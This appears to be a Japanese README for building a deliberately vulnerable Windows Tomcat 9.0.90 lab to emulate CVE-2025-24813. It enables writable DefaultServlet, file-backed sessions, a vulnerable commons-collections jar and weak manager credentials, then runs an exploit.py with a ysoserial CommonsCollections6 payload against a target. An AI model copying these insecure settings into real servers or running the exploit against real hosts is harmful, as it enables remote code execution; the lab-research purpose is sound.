
Windows Server 2019 Standard 上で java 25.0.1 2025-10-21 LTS を使用した Tomcat v9.0.90 の迅速なデプロイ手順(楽をしたい研究者向け)。
このリポジトリは、サイバーセキュリティの脅威エミュレーション演習のために、Windows Server 2019 Standard 上で Tomcat v9.0.90 と java 25.0.1 2025-10-21 LTS を迅速にデプロイするための明確な手順を提供することを目的としています。exploit.py は ysoserial-all.jar の CommonsCollections6 モジュールを利用してペイロードを作成し、そのペイロードは後に %CATALINA_HOME%\webapps\ROOT\WEB-INF\lib にある commons-collections-3.2.1.jar 依存関係によってデシリアライズされます。
Tomcat v9.0.90 をダウンロード:Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"
java 25.0.1 2025-10-21 LTS をダウンロード (ZIP版):Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"
1. Click on Start
2. Type "edit the system environment variables"
3. Create two new System Variables named
- `%JAVA_HOME%` with value `C:\jdk-25.0.1`
- `%CATALINA_HOME%` with value `C:\apache-tomcat-9.0.90`
4. Edit the System Variable named `Path`, and add the following values:
- `%JAVA_HOME%\bin`
- `%CATALINA_HOME%\bin`
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"
tomcat-9.0.90\conf フォルダ内の tomcat-users.xml を開き、</tomcat-users> の前に以下を追加します:<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
tomcat-9.0.90\conf フォルダ内の context.xml を開き、すべてのコンテンツを次の内容に置き換えます:<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>
<Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
</Context>
tomcat-9.0.90\conf フォルダ内の web.xml を開き、DefaultServlet を検索して、<servlet></servlet> 全体を次の内容に置き換えます:<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
shutdown.bat
startup.bat
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
C:\tomcat-9.0.90\webapps\ROOT にもっともらしい index.html を置いて、見た目を良くしましょう。C:\apache-tomcat-9.0.90\conf\web.xml を開き、"<Connector port=" を検索します。そのブロックをコメントアウトして、独自の .pfx パスを追加できます。以下は、新しく作成した ssl フォルダにパスワードなしの cert.pfx を追加し、HTTP/1.1 で実行する例です:<Connector port="443"
protocol="org.apache.coyote.http11.Http11NioProtocol"
maxThreads="150"
SSLEnabled="true"
scheme="https"
secure="true">
<SSLHostConfig>
<Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
certificateKeystorePassword=""
certificateKeystoreType="PKCS12" />
</SSLHostConfig>
</Connector>
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow
exploit.py のクローンgit clone <this-repo-url>
cd CVE-2025-24813
pip install requests
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
python exploit.py -t http://<target IP>:8080/ -c "cmd.exe /c calc.exe"
exploit.py を実行するたびに、ランダムな名前のセッションファイルが2つ C:\tomcat-9.0.90\webapps\ROOT と C:\tomcat-9.0.90\work\Catalina\localhost\ROOT に作成されます。work フォルダ内の .session ファイルは、実行後数秒で削除されるはずです。